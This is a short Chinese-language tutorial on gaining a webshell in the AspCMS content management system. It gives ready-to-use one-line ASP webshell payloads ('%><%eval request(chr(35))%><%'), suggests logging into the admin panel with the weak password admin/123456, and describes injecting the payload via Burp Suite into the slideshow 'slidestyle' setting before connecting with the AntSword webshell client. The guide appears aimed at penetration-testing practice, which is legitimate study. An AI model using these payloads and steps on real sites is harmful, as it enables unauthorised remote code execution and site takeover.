aspcms拿webshell

攻击思路

网站中的配置文件，如果可在后台里进行修改，如果没有任何过滤，可以在里面写入而已的语句，即可
获取webshell。

注：注意闭合问题，因为配置文件在网站中是全局调用，如果写错，网站会错误。无法访问。
在aspcms可以修改 如果是字符类型填写双引号闭合 如果是数字

"%><%eval request(chr(35))%><%
%><%eval request(chr(35))%><%

暴力破解

一样的，通过弱口令进入到后台。
账号：admin 密码：123456

获取webshell

点击拓展功能->幻灯片管理，打开burpsuit进行抓包。

在slidestyle的后面写入一句话木马，注意闭合问题，并进行URL-encode。

放包，用蚁剑尝试连接，连接成功。